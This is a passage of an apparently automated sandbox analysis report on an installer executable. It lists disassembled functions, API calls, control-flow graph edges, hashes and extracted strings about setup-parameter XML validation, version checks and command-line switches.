6c8e284b-6c8e285c 1339->1351 1344 6c8e280e-6c8e2810 1341->1344 1345 6c8e2814-6c8e281e call 6c8dfacf 1341->1345 1344->1345 1345->1260 1357 6c8e285e-6c8e2860 1351->1357 1358 6c8e2864-6c8e286c call 6c8e02c6 1351->1358 1354->1256 1365 6c8e289a-6c8e28ab 1354->1365 1405 6c8e2ade-6c8e2ae2 1355->1405 1406 6c8e2ad7-6c8e2add call 6c91b081 1355->1406 1357->1358 1358->1260 1369 6c8e28ad-6c8e28af 1365->1369 1370 6c8e28b3-6c8e28bb call 6c8e1287 1365->1370 1369->1370 1370->1260 1375->1374 1406->1405
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E2589
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8E2AB0
                                                                                                • Part of subcall function 6C91C0AA: std::exception::exception.LIBCMT ref: 6C91C0F9
                                                                                                • Part of subcall function 6C91C0AA: std::exception::exception.LIBCMT ref: 6C91C113
                                                                                                • Part of subcall function 6C91C0AA: __CxxThrowException@8.LIBCMT ref: 6C91C124
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8H_prolog3Throwstd::exception::exception$_malloc
                                                                                              • String ID: ", local path $". Valid types are MSI, MSP, Exe, Patches, ServiceControl and File. Theses are case sensitive.$(not applicable)$Adding Item type "$AgileMSI$CleanupBlock$Exe$File$MSI$MSP$ParameterInfo.xml$Patches$RelatedProducts$ServiceControl$Unknown Item type "$schema validation failure: unknown Item type -
                                                                                              • API String ID: 3439882596-1328758535
                                                                                              • Opcode ID: 10cbe1f0fd6babd481d23fa539f6c3efefd7c86ada9ab7b058b3ec0892b3f958
                                                                                              • Instruction ID: 8e879fc51492ce6bb24c0ab691473a4c0eee75ad6a54020e985a11aa594b8dfa
                                                                                              • Opcode Fuzzy Hash: 10cbe1f0fd6babd481d23fa539f6c3efefd7c86ada9ab7b058b3ec0892b3f958
                                                                                              • Instruction Fuzzy Hash: 61029F7190521CEFCB25DBE8CE45AED7BB4AF1E308F104969E415E7B81CB34DA088B65
                                                                                              Function 63956199 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 265COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639561A0
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63951E75: __EH_prolog3.LIBCMT ref: 63951E7C
                                                                                                • Part of subcall function 63951E75: GetThreadLocale.KERNEL32(?,00000004,63956734,0000004C,0000004C,63957142,?,00000000), ref: 63951E8E
                                                                                              • PathIsRelativeW.SHLWAPI(?,?,?,0000003C,63967332,?,?,?,?,?,?,?,00000000,?,?,?), ref: 639561E9
                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 639561F6
                                                                                              • PathFileExistsW.KERNELBASE(?,?), ref: 6395622B
                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 63956230
                                                                                              • CoInitialize.OLE32(00000000), ref: 63956299
                                                                                              • CoUninitialize.OLE32(?,?), ref: 63956340
                                                                                              • __CxxThrowException@8.LIBCMT ref: 639563B7
                                                                                              • __EH_prolog3.LIBCMT ref: 639563C9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3Path$ExistsFile$Exception@8InitializeLocaleRelativeThreadThrowUninitialize
                                                                                              • String ID: ' was not found in UiInfo.xml$String for StringID '$Strings$Strings.xml$Successfuly found file %s $UIInfo.xml$^wu
                                                                                              • API String ID: 1923347782-2025596970
                                                                                              • Opcode ID: b5acee74e87d2ad749abed92e28a44c6d976e7c8eea16085ebe9bf5759dc2c04
                                                                                              • Instruction ID: 489f726252fc79028830295c2996886c85020bcfedf992e91676eadc4bd2a038
                                                                                              • Opcode Fuzzy Hash: b5acee74e87d2ad749abed92e28a44c6d976e7c8eea16085ebe9bf5759dc2c04
                                                                                              • Instruction Fuzzy Hash: 79A17C71900209EFDB00DFA8C945BDEBBB8AF16B28F148155F524EB282DB30DA55CF61
                                                                                              Function 6C8C3E77 Relevance: 31.7, APIs: 1, Strings: 17, Instructions: 219COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F9067: __EH_prolog3.LIBCMT ref: 6C8F906E
                                                                                                • Part of subcall function 6C8F9067: __recalloc.LIBCMT ref: 6C8F90B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$__recalloc
                                                                                              • String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
                                                                                              • API String ID: 1900422986-634121796
                                                                                              • Opcode ID: ecb891d93cccdf360072234201aecbdf1862bef95b919dc56faa38966e711f99
                                                                                              • Instruction ID: e1b076e1a7c7f549d4ae0ae6cfb432cefdc88abae9fbacb6bfb6b0ca616acb51
                                                                                              • Opcode Fuzzy Hash: ecb891d93cccdf360072234201aecbdf1862bef95b919dc56faa38966e711f99
                                                                                              • Instruction Fuzzy Hash: E691093140428CBADB10DFB8CA44BCC77A9AF2136CF54C956A8349BB81D7B5D70DA725
                                                                                              Function 6C8D148D Relevance: 30.3, APIs: 3, Strings: 14, Instructions: 510COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1625 6c8d148d-6c8d1502 call 6c8cac58 call 6c8f85bc 1631 6c8d158e-6c8d15a1 call 6c8f85bc 1625->1631 1632 6c8d1508-6c8d151d call 6c91c0aa 1625->1632 1639 6c8d160b-6c8d161c call 6c8f85bc 1631->1639 1640 6c8d15a3-6c8d15b8 call 6c91c0aa 1631->1640 1637 6c8d151f-6c8d1552 call 6c8f833e call 6c8d0e96 call 6c918f0e 1632->1637 1638 6c8d1554 1632->1638 1644 6c8d1556-6c8d1561 1637->1644 1638->1644 1652 6c8d161e-6c8d1631 call 6c91c0aa 1639->1652 1653 6c8d1661-6c8d1674 call 6c8f85bc 1639->1653 1654 6c8d15ef 1640->1654 1655 6c8d15ba-6c8d15ed call 6c8f833e call 6c8d0e96 call 6c918f0e 1640->1655 1645 6c8d1569 1644->1645 1646 6c8d1563-6c8d1565 1644->1646 1650 6c8d156b-6c8d158b call 6c918f0e 1645->1650 1646->1645 1672 6c8d1643 1652->1672 1673 6c8d1633-6c8d1641 call 6c8d11f6 1652->1673 1669 6c8d16c9-6c8d16dc call 6c8f85bc 1653->1669 1670 6c8d1676-6c8d168b call 6c91c0aa 1653->1670 1657 6c8d15f1-6c8d15fc 1654->1657 1655->1657 1663 6c8d15fe-6c8d1600 1657->1663 1664 6c8d1604-6c8d1606 1657->1664 1663->1664 1664->1650 1686 6c8d16de-6c8d16f3 call 6c91c0aa 1669->1686 1687 6c8d1731-6c8d1744 call 6c8f85bc 1669->1687 1670->1654 1688 6c8d1691-6c8d16c4 call 6c8f833e call 6c8d00a7 call 6c918f0e 1670->1688 1676 6c8d1645-6c8d1650 1672->1676 1673->1676 1676->1650 1682 6c8d1656-6c8d165c 1676->1682 1682->1650 1686->1654 1698 6c8d16f9-6c8d172c call 6c8f833e call 6c8d00a7 call 6c918f0e 1686->1698 1696 6c8d1799-6c8d17ac call 6c8f85bc 1687->1696 1697 6c8d1746-6c8d175b call 6c91c0aa 1687->1697 1688->1657 1708 6c8d17ae-6c8d17c3 call 6c91c0aa 1696->1708 1709 6c8d1801-6c8d1814 call 6c8f85bc 1696->1709 1697->1654 1711 6c8d1761-6c8d1794 call 6c8f833e call 6c8d00a7 call 6c918f0e 1697->1711 1698->1657 1708->1654 1721 6c8d17c9-6c8d17fc call 6c8f833e call 6c8d00a7 call 6c918f0e 1708->1721 1723 6c8d1869-6c8d187a call 6c8f85bc 1709->1723 1724 6c8d1816-6c8d182b call 6c91c0aa 1709->1724 1711->1657 1721->1657 1736 6c8d187c-6c8d188f call 6c91c0aa 1723->1736 1737 6c8d18a6-6c8d18b7 call 6c8f85bc 1723->1737 1724->1654 1734 6c8d1831-6c8d1864 call 6c8f833e call 6c8d00a7 call 6c918f0e 1724->1734 1734->1657 1736->1672 1751 6c8d1895-6c8d18a1 call 6c8d0baa 1736->1751 1748 6c8d18b9-6c8d18c3 call 6c91c0aa 1737->1748 1749 6c8d18d7-6c8d18e8 call 6c8f85bc 1737->1749 1748->1672 1761 6c8d18c9 1748->1761 1762 6c8d18ea-6c8d18f4 call 6c91c0aa 1749->1762 1763 6c8d1902-6c8d19d7 call 6c8f833e call 6c8f8cd5 call 6c8c838a call 6c918f0e * 2 call 6c8c8415 call 6c918f0e call 6c8ca378 call 6c9214aa call 6c926e1a call 6c8c8b9f call 6c8d148d 1749->1763 1751->1737 1765 6c8d18cf 1761->1765 1762->1672 1769 6c8d18fa-6c8d1900 1762->1769 1793 6c8d19dc-6c8d19e8 1763->1793 1765->1749 1769->1765 1794 6c8d19ea-6c8d19ec 1793->1794 1795 6c8d19f0-6c8d1a19 call 6c918eab 1793->1795 1794->1795 1798 6c8d1a1b-6c8d1a1d 1795->1798 1799 6c8d1a21-6c8d1a29 call 6c8c922c 1795->1799 1798->1799 1802 6c8d1a2f-6c8d1ade call 6c8f833e call 6c8f8cd5 call 6c8f8c7a call 6c8c838a call 6c918f0e * 3 call 6c8c8415 call 6c918f0e call 6c8ca378 call 6c9214aa 1799->1802 1803 6c8d1ae3-6c8d1aea call 6c926f06 1799->1803 1802->1803
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8FreeStringThrow_malloc
                                                                                              • String ID: can only have one logical or arithmietic expression for a child node$AlwaysTrue$And$Equals$Exists$GreaterThan$GreaterThanOrEqualTo$LessThan$LessThanOrEqualTo$NeverTrue$Not$ParameterInfo.xml$schema validation failure: $schema validation failure: unknown Expression:
                                                                                              • API String ID: 1924927865-100526994
                                                                                              • Opcode ID: 80c734b8aeac705cb1cc88aea5394e0e20fec56164173d4f79f1ab6ffdcdfe37
                                                                                              • Instruction ID: 0b97dcea306321295a48b0d413f71b41f4a446ed6ced9413316cb4795b5c71f2
                                                                                              • Opcode Fuzzy Hash: 80c734b8aeac705cb1cc88aea5394e0e20fec56164173d4f79f1ab6ffdcdfe37
                                                                                              • Instruction Fuzzy Hash: D502D0711083459FD720CFA8CA41B9EB7E8AF95328F110E2EF495D7B91DB30E9098762
                                                                                              Function 6395BCBB Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 111windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395BCC2
                                                                                                • Part of subcall function 63961DCD: __EH_prolog3.LIBCMT ref: 63961DD4
                                                                                                • Part of subcall function 63961DCD: GetCommandLineW.KERNEL32(00000018,6395B178,00000000,?,?,6395AC46,?), ref: 63961DD9
                                                                                              • SendMessageW.USER32(?,0000046B,00000000,00000000), ref: 6395BCDC
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 6395BCED
                                                                                              • EnableMenuItem.USER32(00000000), ref: 6395BCF4
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 6395BD04
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 6395BD15
                                                                                              • GetSystemMenu.USER32(?,00000000), ref: 6395BD21
                                                                                              • InsertMenuW.USER32(?,00000000,00000400,0000F120,00000000), ref: 6395BD5F
                                                                                              • InsertMenuW.USER32(?,00000002,00000400,0000F020,00000000), ref: 6395BDA5
                                                                                              • InsertMenuW.USER32(?,00000003,00000400,0000F00F,00000000), ref: 6395BDC3
                                                                                              • SetMenuItemBitmaps.USER32(?,0000F120,00000000,00000002,00000002), ref: 6395BDD9
                                                                                              • SetMenuItemBitmaps.USER32(?,0000F020,00000000,00000003,00000003), ref: 6395BDE5
                                                                                              • KiUserCallbackDispatcher.NTDLL(?), ref: 6395BDEA
                                                                                              • SetWindowLongW.USER32(?,000000FC,6395BF84), ref: 6395BE0C
                                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 6395BE1A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$LongWindow$InsertItem$BitmapsH_prolog3System$CallbackCommandDispatcherEnableLineMessageSendUser
                                                                                              • String ID: IDS_MINIMIZE$IDS_RESTORE
                                                                                              • API String ID: 435486374-4171729070
                                                                                              • Opcode ID: 2693376ae382075a543852cbf3864145624eae6fd827daee303f2272d83fbd8f
                                                                                              • Instruction ID: e94a4b7395d0bc039dbd123767c9781507e87ea42e6b2080b0f8cf7473295e1b
                                                                                              • Opcode Fuzzy Hash: 2693376ae382075a543852cbf3864145624eae6fd827daee303f2272d83fbd8f
                                                                                              • Instruction Fuzzy Hash: 4341A03054430AAFDF20ABA4CC49FAE7BB5FF8AB14F104614F265AA1E1C771A950DF14
                                                                                              Function 6C909D05 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 311COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 6C8C39AD: __EH_prolog3.LIBCMT ref: 6C8C39B4
                                                                                              • GetCommandLineW.KERNEL32(38D98A99,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 6C909D54
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8C3A16: __EH_prolog3.LIBCMT ref: 6C8C3A1D
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C909EBD
                                                                                              Strings
                                                                                              • lower, xrefs: 6C909FFA
                                                                                              • ParameterInfo.xml, xrefs: 6C909E2E, 6C909F67, 6C90A096
                                                                                              • SetupVersion specified in ParameterInfo.xml is , xrefs: 6C90A029
                                                                                              • Current SetupVersion = %s, xrefs: 6C909D43
                                                                                              • SetupVersion not specified, xrefs: 6C909E1F
                                                                                              • SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version., xrefs: 6C909F44
                                                                                              • SetupVersion, xrefs: 6C909DC0
                                                                                              • Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check., xrefs: 6C909D95
                                                                                              • SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version., xrefs: 6C909F58
                                                                                              • NoSetupVersionCheck, xrefs: 6C909D6C
                                                                                              • higher, xrefs: 6C90A001, 6C90A017
                                                                                              • SetupVersion specified in ParameterInfo.xml is '%s', xrefs: 6C909EC3
                                                                                              • than the currently supported version., xrefs: 6C90A006
                                                                                              • 1.0, xrefs: 6C909D3D, 6C909D42, 6C909ED4, 6C909EFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CommandException@8LineThrow
                                                                                              • String ID: than the currently supported version.$1.0$Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check.$Current SetupVersion = %s$NoSetupVersionCheck$ParameterInfo.xml$SetupVersion$SetupVersion not specified$SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version.$SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version.$SetupVersion specified in ParameterInfo.xml is $SetupVersion specified in ParameterInfo.xml is '%s'$higher$lower
                                                                                              • API String ID: 1129948358-1674238012
                                                                                              • Opcode ID: 1758c59053ecd3c89630461dc84e563cefc9964da68f499504cadaf8629a32e3
                                                                                              • Instruction ID: 444c05105f0293ee1a0be0dc5563b45430d7e80b3c5200c57388a6c2eb635091
                                                                                              • Opcode Fuzzy Hash: 1758c59053ecd3c89630461dc84e563cefc9964da68f499504cadaf8629a32e3
                                                                                              • Instruction Fuzzy Hash: D8C16C721087409FD324DB78C940A9FBBE8AF96318F140E2DF1A597B91DB74D9098B53
                                                                                              Function 6C8D293D Relevance: 26.7, APIs: 2, Strings: 13, Instructions: 416COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2066 6c8d293d-6c8d2982 call 6c926e1a call 6c8f833e * 2 2073 6c8d298a-6c8d29ae call 6c8c9411 call 6c8d2677 2066->2073 2074 6c8d2984-6c8d2986 2066->2074 2079 6c8d29b6-6c8d29fc call 6c918f0e call 6c8f833e * 2 2073->2079 2080 6c8d29b0-6c8d29b2 2073->2080 2074->2073 2087 6c8d29fe-6c8d2a00 2079->2087 2088 6c8d2a04-6c8d2a2c call 6c8c9411 call 6c8d2677 2079->2088 2080->2079 2087->2088 2093 6c8d2a2e-6c8d2a30 2088->2093 2094 6c8d2a34-6c8d2a7a call 6c918f0e call 6c8f833e * 2 2088->2094 2093->2094 2101 6c8d2a7c-6c8d2a7e 2094->2101 2102 6c8d2a82-6c8d2aaa call 6c8c9411 call 6c8d2677 2094->2102 2101->2102 2107 6c8d2aac-6c8d2aae 2102->2107 2108 6c8d2ab2-6c8d2ac4 call 6c918f0e 2102->2108 2107->2108 2111 6c8d2aca-6c8d2ae8 call 6c8f833e 2108->2111 2112 6c8d2e05-6c8d2e0d call 6c926f06 2108->2112 2117 6c8d2aea-6c8d2aec 2111->2117 2118 6c8d2af0-6c8d2b23 call 6c8c89b7 call 6c918f0e call 6c8f833e 2111->2118 2117->2118 2125 6c8d2b2b-6c8d2b4f call 6c8c92d1 call 6c8f833e 2118->2125 2126 6c8d2b25-6c8d2b27 2118->2126 2131 6c8d2b57-6c8d2b7b call 6c8c92d1 call 6c8f833e 2125->2131 2132 6c8d2b51-6c8d2b53 2125->2132 2126->2125 2137 6c8d2b7d-6c8d2b7f 2131->2137 2138 6c8d2b83-6c8d2b8c call 6c8c92d1 2131->2138 2132->2131 2137->2138 2141 6c8d2b8e-6c8d2b90 2138->2141 2142 6c8d2c05 2138->2142 2143 6c8d2b96-6c8d2b98 2141->2143 2144 6c8d2cc1 2141->2144 2145 6c8d2cbf 2142->2145 2146 6c8d2c0b-6c8d2c0e 2142->2146 2147 6c8d2b9e-6c8d2bfc call 6c8f833e * 2 call 6c8c838a call 6c918f0e * 2 call 6c8ca378 2143->2147 2148 6c8d2d64 2143->2148 2151 6c8d2cc7-6c8d2cca 2144->2151 2152 6c8d2d62 2144->2152 2145->2144 2149 6c8d2c10-6c8d2c4e call 6c8f833e * 2 call 6c8c838a call 6c918f0e 2146->2149 2150 6c8d2c73-6c8d2c79 2146->2150 2225 6c8d2bff-6c8d2c00 call 6c9214aa 2147->2225 2148->2112 2155 6c8d2d6a-6c8d2d6d 2148->2155 2214 6c8d2c52-6c8d2c71 call 6c918f0e call 6c8ca378 2149->2214 2150->2145 2153 6c8d2c7b-6c8d2cbd call 6c8f833e * 2 call 6c8c838a call 6c918f0e 2150->2153 2157 6c8d2ccc-6c8d2d0e call 6c8f833e * 2 call 6c8c838a call 6c918f0e 2151->2157 2158 6c8d2d13-6c8d2d19 2151->2158 2152->2148 2153->2214 2162 6c8d2d6f-6c8d2dad call 6c8f833e * 2 call 6c8c838a call 6c918f0e 2155->2162 2163 6c8d2db6-6c8d2dbc 2155->2163 2157->2214 2158->2152 2165 6c8d2d1b-6c8d2d59 call 6c8f833e * 2 call 6c8c838a call 6c918f0e 2158->2165 2162->2163 2163->2112 2167 6c8d2dbe-6c8d2dfc call 6c8f833e * 2 call 6c8c838a call 6c918f0e 2163->2167 2165->2152 2167->2112 2214->2225 2225->2142
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D2944
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8D2677: __EH_prolog3.LIBCMT ref: 6C8D267E
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8CA378: __EH_prolog3.LIBCMT ref: 6C8CA37F
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D2C00
                                                                                                • Part of subcall function 6C9214AA: KiUserExceptionDispatcher.NTDLL(?,?,6C91C129,00000C00,?,?,?,?,6C91C129,00000C00,6C93BA3C,6C9576D4,00000C00,00000020,6C8FF845,?), ref: 6C9214EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                                                              • String ID: 8$Blockers$ParameterInfo.xml$StopBlockers$SuccessBlockers$WarnBlockers$schema validation failure: More than 1 Stop Block defined.$schema validation failure: More than 1 Success Block defined.$schema validation failure: More than 1 Warning Block defined.$schema validation failure: Stop blockers has no child node$schema validation failure: Success blockers has no child node$schema validation failure: Warn blockers has no child node$schema validation failure: no valid child element found for 'Blockers' node.
                                                                                              • API String ID: 3417717588-4180151753
                                                                                              • Opcode ID: 80ce3f2ed12775cc7227ec3c0cd66cf3a48587dbd2bf08d4461e7875b4009b32
                                                                                              • Instruction ID: c5a4f33310408b3de0ac63921b0b3a560fb16a9b953d70f34a9ad9f98e04eff1
                                                                                              • Opcode Fuzzy Hash: 80ce3f2ed12775cc7227ec3c0cd66cf3a48587dbd2bf08d4461e7875b4009b32
                                                                                              • Instruction Fuzzy Hash: 9AF1A171904249EBCF24DBECCA44ADE7BB8AF15318F148969F024D7B81DB74DA09CB61
                                                                                              Function 6C5D2C9B Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 295memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
